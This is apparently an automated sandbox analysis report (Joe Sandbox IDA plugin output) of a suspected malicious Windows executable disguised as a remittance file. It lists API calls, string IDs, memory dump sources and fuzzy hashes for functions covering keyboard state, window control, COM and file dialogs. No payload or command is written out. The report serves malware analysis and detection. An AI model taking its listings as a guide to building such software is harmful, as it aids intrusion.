                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                      • DeleteObject.GDI32(?), ref: 004301D0
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                      Similarity
                                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3969911579-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                      • String ID: 0
                                                                      • API String ID: 956284711-4108050209
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 1965227024-3771769585
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                      Similarity
                                                                      • API ID: SendString$_memmove_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 369157077-1007645807
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00445BF8
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                      • __wcsicoll.LIBCMT ref: 00445C33
                                                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Similarity
• API ID: MessageSend$CharNext
• API String ID: 1350042424-0
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
• _wprintf.LIBCMT ref: 0045E8D7
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-2354261254
Similarity
• API ID: __swprintf_wcscpy$__i64tow__itow
• String ID: %.15g$0x%p$False$True
• API String ID: 3038501623-2263619337
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
• __swprintf.LIBCMT ref: 0045E5F6
• _wprintf.LIBCMT ref: 0045E6A3
• _wprintf.LIBCMT ref: 0045E6C7
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-8599901
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(00000000), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(00000000), ref: 00443C3A
• EndDialog.USER32(00000000,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Similarity
• API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
• String ID: BUTTON
• API String ID: 1834419854-3405671355
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
• LoadStringW.USER32(00000000), ref: 00454040
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• _wprintf.LIBCMT ref: 00454074
• __swprintf.LIBCMT ref: 004540A3
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 455036304-4153970271
APIs
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
• SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
• SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
• _memmove.LIBCMT ref: 00467EB8
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
• _memmove.LIBCMT ref: 00467F6C
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
• SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                      • String ID:
                                                                      • API String ID: 2170234536-0
                                                                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                      • DeleteObject.GDI32(?), ref: 0047151E
                                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                      • DeleteObject.GDI32(?), ref: 004715EA
                                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                      • String ID:
                                                                      • API String ID: 3218148540-0
                                                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                      • String ID:
                                                                      • API String ID: 136442275-0
                                                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                      APIs
                                                                      • _wcsncpy.LIBCMT ref: 00467490
                                                                      • _wcsncpy.LIBCMT ref: 004674BC
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • _wcstok.LIBCMT ref: 004674FF
                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                      • String ID: X
                                                                      • API String ID: 3104067586-3081909835
                                                                      • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                      • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                      • _wcslen.LIBCMT ref: 0046CDB0
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 440038798-2785691316
                                                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                      • _wcslen.LIBCMT ref: 004610A3
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4136854206-1241985126
                                                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
